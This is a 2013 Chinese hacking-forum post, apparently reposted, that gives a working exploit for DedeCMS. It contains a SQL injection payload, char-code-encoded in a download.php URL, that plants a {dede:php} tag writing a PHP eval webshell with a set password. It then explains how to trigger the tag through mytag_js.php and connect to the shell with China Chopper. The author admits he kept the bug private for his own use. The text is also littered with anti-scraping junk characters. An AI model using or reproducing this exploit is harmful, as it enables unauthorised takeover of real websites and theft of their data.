本帖最后由 土豆 于 2013-6-10 14:41 编辑 p' f/ N: H* w. [
( C8 ]8 e, }, a8 ]' X2 @7 U* ?) V0 m
4 S& w4 F# q* L作者:鬼哥- l( g. e4 y; d
: j5 H/ d& ^) l9 \看贴不回,没JJ
1 B9 p( ~/ Q; f& p7 U6 i p0 k) j) ?7 x
漏洞大家都知道是哪个。
6 W3 G3 a1 Q$ U; } l9 ?' W) p7 [/ @: q9 W. l) S& P8 m
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
- _* ]4 ^- ]( ]+ f: K$ l
! I* l3 R: J$ i& c但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
' ? |8 C& _7 J8 @& z, y: P, E5 ]' Q
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?% @$ i0 Y1 T2 }" [' X% d" ]( i
: _9 `4 W2 ^( C9 z) O( E6 Cgetshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
9 q; o. G8 |( i/ }5 ~. U" Z/ R8 a- v8 K4 D
但是测试了下。。失败
9 G" ?, N" w5 ^ E* F: K# T1 Q8 k- i( |6 O5 l* W9 T1 n& L
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。2 Y: K* I, i+ A/ D1 _8 T
6 h" Q$ h! H- K2 o o
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
0 H& O( A1 V. J6 [- z! c) r) _8 W
0 G. @( Q& j6 P1 u- yEXP:
, d+ C* F5 u2 @; h) T o& ^' s& f& _
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96; y. J* O& C. G' q
8 @2 o; E" h$ U) H2 Z# U- G! q- J
1 y2 f, E2 r8 k3 d! n; N# o成功增加。
8 U' c! O- g2 W' b7 N1 k4 v4 q/ ^' o# A* t# {; P; e5 {: C
访问http://www.xxx.com/plus/mytag_js.php?aid=9013
9 ?4 M8 Y: {0 M! j. u8 u9 q" ?生成一句话木马.
8 ? j" x% f: z" B) h/ p& @菜刀连接 http://www.xxx.com/plus/90sec.php 密码 guige
% i0 \6 I! O# B- i: @9 h; T
j1 x* v [3 e! s! u Z) x测试OK。
# o1 H. Y( i* `, t4 s$ o( e, R# Q$ Q1 A* X- t5 m- J: p( B
/ }1 ]0 Q$ a7 P8 E; p2 r
|
发表于 2013-6-10 16:49:18
收藏
分享
支持
反对